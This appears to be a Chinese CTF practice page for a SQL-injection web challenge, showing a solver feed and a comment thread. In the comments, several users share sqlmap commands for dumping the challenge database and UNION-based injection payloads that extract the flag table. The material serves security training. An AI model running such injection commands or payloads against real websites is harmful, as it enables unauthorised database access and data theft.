评分(24)
解题动态
warm007 攻破了该题 28分钟前
oo123 攻破了该题 3小时前
MK 攻破了该题 7小时前
passerpty 攻破了该题 8小时前
LCUT 攻破了该题 9小时前
ROOCCO 攻破了该题 12小时前
秋天下的告白 攻破了该题 13小时前
tomcatlzy 攻破了该题 1天前
gdrhdr 攻破了该题 1天前
佳佳佳 攻破了该题 1天前
xiaoku 攻破了该题 1天前
Aimee Kirk 攻破了该题 1天前
刘译新嘿嘿 攻破了该题 1天前
yehlg 攻破了该题 1天前
1.1 攻破了该题 1天前
www.why 攻破了该题 1天前
伊克尔林 攻破了该题 1天前
qazwsxe 攻破了该题 1天前
颜沫 攻破了该题 1天前
评论
ljy1997 8天前
举报
说一下我的思路:1、随便输入1查询,发现会返回一个表格,怀疑有sql注入漏洞。 2、然后用kali自带的sqlmap工具,因为这个工具只能扫描.txt文件,所以先用bs抓包改post请求之后保存成txt文件。 3、sqlmap命令扫描,发现的确是sql注入漏洞。 4、结果里有一个ctf的数据库,肯定就在这儿了 5、接着扫描这个skctf发现里面有fl4g这个表。 6、接着扫描,出结果。
Galaxies2580 14天前
举报
为什么打不开靶机网址,显示无法访问
叶澜 2月前
举报
sqlmap -u "http://171.80.2.169:11993/" --forms -D skctf --dump
lovehhh 4月前
举报
1' and 1=2 union select group_concat(skctf_flag),2,3,4 from fl4g;#--
000000k 5月前
举报
sqlmap 秒了
道法自然 5月前
举报
直接用sqlmap一把梭
chm 6月前
举报
爆库、爆表、爆字段、拿 flag
chm 6月前
举报
flag{**********}
wywitkey 6月前
举报
sqlmap一把梭,payload:sqlmap -u http://171.80.2.169:13533/index.php --form --batch -D skctf -T fl4g --columns --dump;就是等的时间长点....
78 5月前
举报
@wywitkey 说跟没说没区别
wywitkey 6月前
举报
@2647941092 各有各的好吧,因为是时间盲注才慢的,用sqlmap我在命令跑起来后去干别的,切回来时flag就出来了,当然了我也感觉手搓更爽
2647941092 6月前
举报
还不如手戳
玲珑塔小1精 6月前
举报
联合注入 ?id=-1' union select 1,2,3,4--